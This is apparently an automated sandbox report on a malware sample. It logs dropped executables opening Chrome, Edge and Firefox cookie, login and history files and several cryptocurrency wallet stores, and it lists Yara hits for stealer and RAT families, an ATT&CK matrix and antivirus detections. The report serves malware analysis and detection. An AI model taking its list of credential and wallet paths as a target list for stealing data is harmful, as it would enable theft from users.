Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqlite	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite	Jump to behavior
Source: C:\Recovery\HpQPPZazcv.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\57328c1e-640f-4b62-a5a0-06d479b676c2	Jump to behavior
Source: C:\Recovery\HpQPPZazcv.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data	Jump to behavior
Source: C:\Recovery\HpQPPZazcv.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285f	Jump to behavior
Source: C:\Recovery\HpQPPZazcv.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db	Jump to behavior
Source: C:\Recovery\HpQPPZazcv.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage.sqlite	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\e8d04e65-de13-4e7d-b232-291855cace25	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB	Jump to behavior
Source: C:\Recovery\HpQPPZazcv.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98a	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage	Jump to behavior
Source: C:\Recovery\HpQPPZazcv.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi	Jump to behavior
Source: C:\Recovery\HpQPPZazcv.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads	Jump to behavior
Source: C:\Recovery\HpQPPZazcv.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\8ad0d94c-ca05-4c9d-8177-48569175e875	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage	Jump to behavior
Source: C:\Recovery\HpQPPZazcv.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default	Jump to behavior
Source: C:\Recovery\HpQPPZazcv.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\5bc1a347-c482-475c-a573-03c10998aeea	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings	Jump to behavior
Source: C:\Recovery\HpQPPZazcv.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage	Jump to behavior
Source: C:\Recovery\HpQPPZazcv.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings	Jump to behavior
Source: C:\Recovery\HpQPPZazcv.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\ls-archive.sqlite	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm	Jump to behavior
Source: C:\Recovery\HpQPPZazcv.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State	Jump to behavior
Source: C:\Recovery\HpQPPZazcv.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB	Jump to behavior
Source: C:\Recovery\HpQPPZazcv.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm	Jump to behavior
Source: C:\Recovery\HpQPPZazcv.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

Tries to steal Crypto Currency Wallets

Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldb	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior

Source: Yara match	File source: 00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: based.exe PID: 6828, type: MEMORYSTR

Remote Access Functionality

Yara detected Blank Grabber

Source: Yara match	File source: 00000002.00000003.1686411097.000001F919A15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1686411097.000001F919A13000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: based.exe PID: 6664, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: based.exe PID: 6828, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\_MEI66642\rarreg.key, type: DROPPED

Yara detected DCRat

Source: Yara match	File source: 00000045.00000002.2932877358.00000000033D5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000045.00000002.2932877358.0000000003144000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000045.00000002.2932877358.0000000003549000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.1949562045.00000000128C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match	File source: 14.3.svchost.exe.4e4e6ea.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.0.ChainComServermonitor.exe.4b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.svchost.exe.564e6ea.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.svchost.exe.4e4e6ea.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.svchost.exe.564e6ea.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000003.1722014407.0000000005600000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.1702500179.00000000076F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1722722653.0000000004E00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000000.1761622309.00000000004B2000.00000002.00000001.01000000.00000023.sdmp, type: MEMORY
Source: Yara match	File source: C:\Recovery\HpQPPZazcv.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Windows Defender\en-US\based.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\powershell.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\svchost.exe, type: DROPPED

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: based.exe PID: 6828, type: MEMORYSTR

Yara detected zgRAT

Source: Yara match	File source: 14.3.svchost.exe.4e4e6ea.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.0.ChainComServermonitor.exe.4b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.svchost.exe.564e6ea.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.svchost.exe.4e4e6ea.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.svchost.exe.564e6ea.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Recovery\HpQPPZazcv.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Windows Defender\en-US\based.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\powershell.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\svchost.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	Valid Accounts	441 Windows Management Instrumentation	111 Scripting	1 Abuse Elevation Control Mechanism	51 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	1 Taint Shared Content	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 Data Encrypted for Impact
Credentials	Domains	Default Accounts	2 Native API	11 DLL Side-Loading	11 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	1 Credential API Hooking	3 File and Directory Discovery	Remote Desktop Protocol	3 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	113 Command and Scripting Interpreter	1 Windows Service	1 Windows Service	1 Abuse Elevation Control Mechanism	Security Account Manager	158 System Information Discovery	SMB/Windows Admin Shares	1 Credential API Hooking	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Service Execution	421 Registry Run Keys / Startup Folder	311 Process Injection	21 Obfuscated Files or Information	NTDS	451 Security Software Discovery	Distributed Component Object Model	1 Clipboard Data	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	3 PowerShell	Network Logon Script	421 Registry Run Keys / Startup Folder	21 Software Packing	LSA Secrets	2 Process Discovery	SSH	Keylogging	15 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 DLL Side-Loading	Cached Domain Credentials	351 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 File Deletion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	4 Rootkit	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	133 Masquerading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	351 Virtualization/Sandbox Evasion	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	311 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	1 Hidden Files and Directories	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
8Ck8T5qRcC.exe	53%	ReversingLabs	Win32.Trojan.Generic
8Ck8T5qRcC.exe	38%	Virustotal		Browse
8Ck8T5qRcC.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Program Files\Windows Defender\en-US\based.exe	100%	Avira	HEUR/AGEN.1323342
C:\Recovery\powershell.exe	100%	Avira	HEUR/AGEN.1323342
C:\ProgramData\setup.exe	100%	Avira	TR/CoinMiner.lnxah
C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe	100%	Avira	HEUR/AGEN.1323342
C:\Recovery\HpQPPZazcv.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\AppData\Local\Temp\O7MNNZ56x3.bat	100%	Avira	BAT/Delbat.C
C:\Program Files\Google\Chrome\updater.exe	100%	Avira	TR/CoinMiner.lnxah
C:\ProgramData\svchost.exe	100%	Avira	VBS/Runner.VPG
C:\Program Files\Windows Defender\en-US\based.exe	100%	Joe Sandbox ML
C:\Recovery\powershell.exe	100%	Joe Sandbox ML
C:\ProgramData\setup.exe	100%	Joe Sandbox ML
C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe	100%	Joe Sandbox ML
C:\Recovery\HpQPPZazcv.exe	100%	Joe Sandbox ML
C:\Program Files\Google\Chrome\updater.exe	100%	Joe Sandbox ML
C:\ProgramData\svchost.exe	100%	Joe Sandbox ML
C:\ProgramData\Microsoft\hacn.exe	100%	Joe Sandbox ML
C:\Program Files\Google\Chrome\updater.exe	71%	ReversingLabs	Win64.Trojan.SilentCryptoMiner
C:\Program Files\Windows Defender\en-US\based.exe	92%	ReversingLabs	ByteCode-MSIL.Trojan.Whispergate
C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe	92%	ReversingLabs	ByteCode-MSIL.Trojan.Whispergate
C:\ProgramData\Microsoft\based.exe	55%	ReversingLabs	Win64.Trojan.Generic
C:\ProgramData\Microsoft\hacn.exe	71%	ReversingLabs	Win64.Trojan.Generic
C:\ProgramData\setup.exe	71%	ReversingLabs	Win64.Trojan.SilentCryptoMiner
C:\ProgramData\svchost.exe	61%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Recovery\HpQPPZazcv.exe	92%	ReversingLabs	ByteCode-MSIL.Trojan.Whispergate
C:\Recovery\powershell.exe	92%	ReversingLabs	ByteCode-MSIL.Trojan.Whispergate
C:\Users\user\AppData\Local\Temp\_MEI66162\VCRUNTIME140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI66162\_bz2.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI66162\_decimal.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI66162\_hashlib.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI66162\_lzma.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI66162\_socket.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI66162\libcrypto-1_1.dll	0%	ReversingLabs
